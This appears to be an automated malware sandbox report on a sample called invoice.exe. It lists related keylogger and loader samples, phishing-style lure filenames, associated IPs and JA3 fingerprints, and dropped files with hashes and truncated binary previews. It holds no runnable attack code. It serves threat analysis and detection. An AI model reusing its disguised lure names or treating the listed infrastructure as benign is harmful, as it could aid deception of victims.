	Order_Ref_53089.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Quote.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PO-4000308887.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	jljwdT2pVF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	New_Order_list.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Remittance_slip.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	52FA61DF5567B0069577DFF44111A00A77D641E816236.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	ARRIVAL_NOTICE.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	INV#94838#Ud83d#Udce9.htm	Get hash	malicious	HTMLPhisher	Browse	134.70.124.2
	vessel_details.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Details.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	KNcPu6PwgIyFBrH.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Shipment_Details.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	PI-_IF269J0163.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	MV_TBN.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Order_Ref_53089.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Quote.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PO-4000308887.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Requirements_Details_Attachments__#Uacac#Uc801_#Uc694#Uccad_#Uac74.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	UWfxZoUMXX.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SOA_Reference.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	202207201610076759.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	a0OevadlcmeS4nl.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	ePAY-Advice_Rf[UC7749879100].exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.186.33 142.250.184.206
	5573_Confirming_685738_Permiso.vbs	Get hash	malicious	FormBook	Browse	142.250.186.33 142.250.184.206
	Royalistic.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.186.33 142.250.184.206
	mkmn3YZFn3.exe	Get hash	malicious	Amadey, Djvu, Fabookie, SmokeLoader	Browse	142.250.186.33 142.250.184.206
	FACT64142.msi	Get hash	malicious	Unknown	Browse	142.250.186.33 142.250.184.206
	D0C93848394-Spodogenic.vbs	Get hash	malicious	Remcos	Browse	142.250.186.33 142.250.184.206
	SC_TR11670000.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.186.33 142.250.184.206
	aRThcK3rSO.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader	Browse	142.250.186.33 142.250.184.206
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	142.250.186.33 142.250.184.206
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	142.250.186.33 142.250.184.206
	setup.exe	Get hash	malicious	Amadey, Djvu, RedLine, SmokeLoader	Browse	142.250.186.33 142.250.184.206
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	142.250.186.33 142.250.184.206
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	142.250.186.33 142.250.184.206
	Update.js	Get hash	malicious	Unknown	Browse	142.250.186.33 142.250.184.206
	purchase_order.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	142.250.186.33 142.250.184.206
	file.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	142.250.186.33 142.250.184.206
	1.bin.exe	Get hash	malicious	Babuk, Djvu	Browse	142.250.186.33 142.250.184.206
	ye5GHWJ8UG.exe	Get hash	malicious	Grandcrab, Gandcrab	Browse	142.250.186.33 142.250.184.206
	setup.exe	Get hash	malicious	Vidar	Browse	142.250.186.33 142.250.184.206
	Update.js	Get hash	malicious	Unknown	Browse	142.250.186.33 142.250.184.206

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll	Justificante de pago.exe	Get hash	malicious	GuLoader	Browse
	Justificante de pago.exe	Get hash	malicious	GuLoader	Browse
	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	GuLoader	Browse
	Justificante de pago.exe	Get hash	malicious	GuLoader	Browse
	Justificante de Transferencia.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Justificante de pago.exe	Get hash	malicious	GuLoader	Browse
	Justificante de Transferencia.exe	Get hash	malicious	GuLoader	Browse
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_caspol.exe_d8eda6a1754a151dd5173ca6db3e65435df63db_ea830a9b_04bcfbd1-2c77-4702-aba0-8ccec9d684fc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2413258792200002
Encrypted:	false
SSDEEP:	192:lMbr9vYxYmBUWSaX+AMWVM+Du760fAIO8h:KFYHBUWSaOaq+Du760fAIO8h
MD5:	AA43B8BBA15A813BFCCD02E862007CD8
SHA1:	8250B873BAC21F5986212B2451B512E48B4349D5
SHA-256:	2D416E1A3C441D6B7DCF6EF0F287F15ED46DCEF848C32BEB31D02196D402DB63
SHA-512:	159EAE789D7948F7077A9761DCEB26AC5A66D646CA0E183AEF6B3DA6EA00C55BECAA2CFC90A5BBC04A875F15CA86A8348895E2A8F6D83D4EAF63D41DD09E77FB
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.3.5.3.7.2.7.4.6.7.6.6.5.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.3.5.3.7.2.7.5.4.2.6.4.7.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.b.c.f.b.d.1.-.2.c.7.7.-.4.7.0.2.-.a.b.a.0.-.8.c.c.e.c.9.d.6.8.4.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.a.4.1.3.2.c.-.e.2.e.4.-.4.0.5.7.-.9.f.9.f.-.4.6.b.2.5.6.2.8.6.7.f.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.a.s.p.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.a.s.p.o.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.f.0.-.0.0.0.1.-.0.0.1.5.-.a.f.2.4.-.a.a.8.c.d.d.5.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.6.8.c.a.3.f.0.1.3.c.4.9.0.1.6.1.c.0.1.5.6.e.f.3.5.9.a.f.0.3.5.9.4.a.e.5.e.2.!.C.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD36E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 17 14:34:35 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	296706
Entropy (8bit):	3.5831200793212092
Encrypted:	false
SSDEEP:	3072:QA5LTg7X74RS+qaqyO0uE04uEqW6PCLFQq:QcTgoAHaqyb04z6S
MD5:	7EBCA7182F74A342B0C77C9FE8DDC072
SHA1:	1F7A577A9AC5731E0DD8130DDBB8B5B01D0F496E
SHA-256:	8D93AC888DBA63A724D6827FCEA592EE97BE5E19BFAE9131BD861813E6C644E5
SHA-512:	5DFF1396A6136908905076DFD12A267B8F69CC6D52F09107AE99EEF40EA84AFAD37AC33A39A543B064CAED628E585E76919C576AB535D5B22AB2CD3311E75CFB
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......{z.d.........................#..........T"..,c..........T.......8...........T........... c...#...........,..........................................................................................bJ......8/......GenuineIntel...........T...........gz.d.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD563.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8434
Entropy (8bit):	3.7091201286754427
Encrypted:	false
SSDEEP:	192:R9l7lZNidI6IyHLoW6YAAo66ngmfZJCGprr89bw0sfBwm:R9lnNiC6IyroW6YAf6agmfXkwnfj
MD5:	A6EEA52F37433165774D6A66E6B6994F
SHA1:	97AEC2A821BA4337326EB3BDEE28195E298F6291
SHA-256:	5F4ECF6632344627BA5B494DEAB0E0E9F97E194E1F1FDC699D9985AADE578C43
SHA-512:	F068BFD03B06815A0677F92099A389CFCE810E184070BF8738E98F394268454DD077BA4A424488B9540E34750DE42AD5400C993401C3D862C9BDCEB290BE95B9
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD593.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4928
Entropy (8bit):	4.554053374413811
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsnle702I7VFJ5WS2Cfjkss3rm8M4Jd0PFr+q8vr0uvkinkd:uILfs7GySPfqJCKXvkinkd
MD5:	5770CD5EAA63B08F65E7E38543698591
SHA1:	E440A41F9A3DAE38151312126A08FA17C818B0D2
SHA-256:	5D8A6CD4D2DE8A2B0B46B87FAEAB8B31E6622D0C5EF81970C9D65975B37CA94E
SHA-512:	5BFC69378548041A332B3E6ECDFA0A687C708BDDF0985D2694512F1967B56C86EC0BCE545567DDCF70CA98D0E113D023AEECE91538D05E5AABF64D8F5AC7453F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222056236" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\icon-ui.icns

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	160264
Entropy (8bit):	4.358279117234243
Encrypted:	false
SSDEEP:	768:EVS3TP/nITMkSXnOLeecEKVdPGeGlo1ciX9NtfoxOpGHXGHmeVDj3bRQ9pY/ycVa:EVsPQBRodPDW4zMctML/
MD5:	B47C741673A92A16B48140FCBDA04030
SHA1:	AA7A003DA656320A274F276EE4BF8C27203D1B4C
SHA-256:	E6E775E7A5AC1BFA01B5A5CB9A7532171817408E67E346E33CA3CB091BDEA478
SHA-512:	464BFC63FD715E07C02ED78F9603A1C890F3848C0D46BB7B58D352B3FF1E76612E8D772903C9954159586735567DD493A023BCFADA5E15407725F7267567DC60
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Justificante de pago.exe, Detection: malicious, Browse Filename: Justificante de pago.exe, Detection: malicious, Browse Filename: Ticari Hesap #U00d6zetiniz.exe, Detection: malicious, Browse Filename: Ticari Hesap #U00d6zetiniz.exe, Detection: malicious, Browse Filename: Justificante de pago.exe, Detection: malicious, Browse Filename: Justificante de Transferencia.exe, Detection: malicious, Browse Filename: BBVA-Confirming Facturas Pagadas al Vencimiento.exe, Detection: malicious, Browse Filename: Justificante de pago.exe, Detection: malicious, Browse Filename: Justificante de Transferencia.exe, Detection: malicious, Browse Filename: BBVA-Confirming Facturas Pagadas al Vencimiento.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!.........P...............................................p.......V....@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@..H,...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	323584
Entropy (8bit):	6.212800759462987
Encrypted:	false
SSDEEP:	3072:KW+Rs18sEZQEwgD+odVKFKLuFv1kJV0YVJL/vFU/lmJ03Hk7OJ3/b7FG66sN4IqF:j7SdPKZ1kJLLH+lmJgHeOVb7o663L
MD5:	86B8B1F5C1189D68B07666784BE882FE
SHA1:	B023E9442CFC9C9652E1C8990F06DEF08BDC5B01
SHA-256:	0DD8C627F3DDBDB61B1910540C465C0D62C9F8D84C7CBB6C80782DB02D535AF0
SHA-512:	E471BEBDD441756CD840420C862CD84EF18A03144DDCAA20D783399D0736BD012D3984E38BDDB9DF16837B205D0A6ECA4C6FEE1D41553B5002A4B1E1B753E139
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mZ.z...z...z....~..z....n..z....m..z.......z...z...z....q..z.......z....{..z..Rich.z..........PE..L....(.P.................p...p....................@........................................................................@...<...................................P................................N..@............................................text....n.......p.................. ..`.rdata........... ..................@..@.data...@Y.......@..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship\vmusbmouse.cat

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	data
Category:	dropped
Size (bytes):	10376
Entropy (8bit):	7.080841609849737
Encrypted:	false
SSDEEP:	192:pL/2EJC+EhGRmwBYyKaWFWQFV5NB0884LfqnajnWc:11PCFRVJlLWc
MD5:	DBE99D951395F37E5C3F4164D8A22245
SHA1:	238EF179549F6AEB2E3C6F4188365814A965312B
SHA-256:	671CB26C75AC0256B07835AE00E7018AF6126FAE7400BF21E57707E0CC9164B5
SHA-512:	3A931015C1038965028AD70E439F75BA210B1113BBCD8A7C5063DA376DBB577F250BE6141B93F1CB100084A930DAD4B2205864F19F3A5E3911CD6CC0B6D0D0D8
Malicious:	false
Preview:	0.(....H........(u0.(q...1.0...`.H.e......0..h..+.....7.....Y0..U0...+.....7.......V...\B........200624081447Z0...+.....7.....0..N0....RA.A.1.6.5.E.2.A.3.9.8.5.E.4.A.A.5.A.9.2.5.3.8.8.2.1.2.1.4.B.1.0.8.3.5.2.3.D.B.F...1..O0@..+.....7...1200...F.i.l.e........v.m.u.s.b.m.o.u.s.e...s.y.s...0M..+.....7...1?0=0...+.....7...0...........0!0...+..........^*9..Z.S.!!K..R=.0X..+.....7...1J0H...O.S.A.t.t.r.......22.:.6...0.,.2.:.6...2.,.2.:.6...3.,.2.:.1.0...0...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RC.2.2.3.E.C.C.5.6.2.3.D.1.E.C.D.2.3.A.8.0.9.C.A.D.4.B.5.F.C.E.7.C.B.6.C.0.2.F.B...1..G0@..+.....7...1200...F.i.l.e........v.m.u.s.b.m.o.u.s.e...i.n.f...0E..+.....7...17050...+.....7.......0!0...+.........#..b=..#.......l..0X..+.....7...1J0H...O.S.A.t.t.r.......22.:.6...0.,.2.:.6...2.,.2.:.6...3.,.2.:.1.0...0...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}........0...0J..+.....7..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	353768
Entropy (8bit):	6.836018886719178
Encrypted:	false
SSDEEP:	6144:EpcTapyHuUcl0PUpFawtMR6gP4aHrmtcWR3uA9:MIaQ+l0PoRtW6aHrmtcWRt9
MD5:	B75A8E0DDEEB4330C1DBA37105244B0F
SHA1:	E5302CA8517AC2826B5D56E3395D41C34B5B3DF7
SHA-256:	CC142B9D8B5223E2720C6440CB7A124C0A80D2FB04ECF59AD7331DFD6E3CB51F
SHA-512:	120F91A144B5B6CC9E33B232AE4466AF2E6C5F702F4C04E9A03DD4F239DE752770E4DE2C6BE2CAF3BEE9775C8887EAB9E08A896D7F2EBA1AD8CF928555CC99A3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.lq..."..."..."..."..."h.."..."..."..."e.."..."e.."k.."..."..."..."..."^.2"..."^.3"..."..."..."Rich..."........PE..L...#..<...........!...............................!................................A....................................0..p...P.......X............N..........`T...................................................................................text....w.......x.................. ..`MSSMIXER.G.......H...\|.............. ..`.rdata..%...........................@..@.data............F..................@....rsrc...X...........................@..@.reloc..tW.......X..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	116720
Entropy (8bit):	5.889271571414613
Encrypted:	false
SSDEEP:	3072:g3nqpX2I6OhctR+lCTD01Lcy4J93TnCx86:L2W1oy4J93TCT
MD5:	DBF787BD6E5CE77FB34FF281A144EB96
SHA1:	50B7799ECCA566BE35429828245D44CB04AD8885
SHA-256:	CCBACEEA04837229C95C08274C747ABE069279AFB990DDD89EC743C42ADC0AD9
SHA-512:	07949EC3882D9CB6E2341CE60C6E911F24463B01F484C037E65A2A8F3495543A096B632E01F8480D03FF388D1E811ECF760155F97F1D5329785C506603BB18A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............u.L.u.L.u.LF.bL.u.LF.aL.u.LF.dL.u.LF.`L.u.L..,L.u.L..<L.u.L.u.L.t.Lu.\|L.u.L...L.u.Lu.`L.u.Lu.fL.u.Lu.cL.u.LRich.u.L........PE..L......U..........................................@.......................................@..................................E..........p...........................`...8...........................0&..@............................................text............................... ..`.rdata...N.......P..................@..@.data...p....`.......T..............@....shared..............^..............@....rsrc...p............`..............@..@.reloc...K.......L...d..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Stemningssvingning\Urgently.Suk

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	ASCII text, with very long lines (52812), with no line terminators
Category:	dropped
Size (bytes):	52812
Entropy (8bit):	2.691443133069214
Encrypted:	false
SSDEEP:	768:w3MHvSSEEEE422O9Py2Ve76uBu+O3+xpnY/A8o9kxErpEEEbYRx+KmGSBAM07byk:bvS53XH/Y/A8opMr07bnr
MD5:	4C6FAD70762561B0D38AA152C52796A8
SHA1:	9FAFD1E9CF41E5482AC7960F7F0C20AB5B703D30
SHA-256:	C7CC1E08C3B0850EF02E7F4371D71918B55686581FDE5D124149884EE56C8F4F
SHA-512:	721DC72FF2153615343BCEC4B408337E8BD5012C234237F2005C43C48D1179DEDC1606014DE6659F5A22BC9116C2348C1AD5B05BF128D60572EEAE9346E06EE0
Malicious:	false
Preview:	000075000000840000430035353535350000DF00000063008585008D8D000000000000B7B7008F006100E2E2000000D3004600005D5D00F80000A10000E5E5E5E5E500000000DCDCDC000B0B0000F7F700000000D9D9D9D9D900000000000000B700EFEF0000B2B200DFDFDF0000DADA000000EEEEEEEEEEEEEEEE00670000050000E700D30000929292920000006E000083000B0B0B0017001D0000E700DF00DF00424242000073005B00BDBDBD00000000C6C60000323200000073006E6E005F5F000000BC00003000005B5B5B001515151515150089898989890000002C2C000096000020202000DA0000FD00C2005F000B0B0B002C000000BE00000000D40000DE005656565600393900000000000000000022220046464600A0A0A000626200E5E5E500000000005D5D0000DA00000000323200DE00850000363636363636000000000000111100006D6D6D00D300FE00007C0000006000005D008181818181007B00777700A3000000C2006900B6B600C9000055555555004000003636009000002A00000000004A4A000000ADAD00B300000F000000002F2F2F00DC0034343400000000BCBC0000006F000061002C0000101000000000004E4E4E4E008900FB002121000000007000004800A9001400CC0000000000000042424200E800000000770000000050000000A900000000A2A2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Udlandsrejse153\Aeroscopic\Clanging\Uskyldsrent\SourceCodePro-ExtraLight.otf

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	OpenType font data
Category:	dropped
Size (bytes):	127080
Entropy (8bit):	7.036042013030407
Encrypted:	false
SSDEEP:	3072:Tz0LOC7z/0cS/Uz0+Gp+dtsVaHGg0IADoQg4RAxL2+p:s7z/0jUz0+GsdBHGg9cg4mvp
MD5:	9ECC8DF598E9EDDE1072942D344CC0CF
SHA1:	9FF240AB48EB7E97237E25D8C6F8CD738BA97CAA
SHA-256:	D945E1C81A59A434E36EEDEF21E64B61CC6901A9E43936AF79C20BDBF57592B1
SHA-512:	09978B7AF39B541C13F5E628BAF789E9FD1635258C74379351612451022D53B38B9F78DA7A74C19BA0FFB7B0C93B63C69EFCFC36285EFBCAF3678ADE7D423AD0
Malicious:	false
Preview:	OTTO.......`BASEe.]........FCFF 0.....Ft..i.DSIG.......`....GDEF............GPOS.s........vGSUB..]....T...JOS/2......P...`cmap.spB......3fhead..h........6hhea.3.....$...$hmtx:C<........Bmaxp. P....H....nameCt........:post...3..FT... ..........JC_.<......................L.:...$.......................X.L.L......................P.. .....X.........X...K...X...^.2.............. .....8.........ADBO... ............`.............. .....J.~.................................$.............<...........H...........T...........`...........l.........&.~.........&......................6...........D..........:.n.....................2...........$.......................D.*.....................4.......................R...........4...........d.l.........0.......................4...........4...........2.(......... .Z.........4.z...................................................................................&...........8...........J...........\.........$.n......... ...........,...........0............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Udlandsrejse153\Aeroscopic\Clanging\Uskyldsrent\cs.txt

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	9204
Entropy (8bit):	5.371514089173945
Encrypted:	false
SSDEEP:	192:iRJ98lWxEb5BvGIrd+mc1OTno+SXhbSIm1JjSvcQpK/w:ijK0GeIrQmEOTno+SXox1JjmpKo
MD5:	641B90F9AEDFC68486D0D20B40F7ECA6
SHA1:	0A683DD844534905336784FADD80498AFE26F6FA
SHA-256:	87A4B9369FD51D76C9032C0E65C3C6221659E086798829072785BE589E55B839
SHA-512:	567CB9F6C31D196A171E5A9C2726A39A9B3D351AC92D4ACF8624213A68C9033ACC31AFAAAD82AA9F5359F32D3A0CA40522E151B8370D553A41ABEB6A6E097078
Malicious:	false
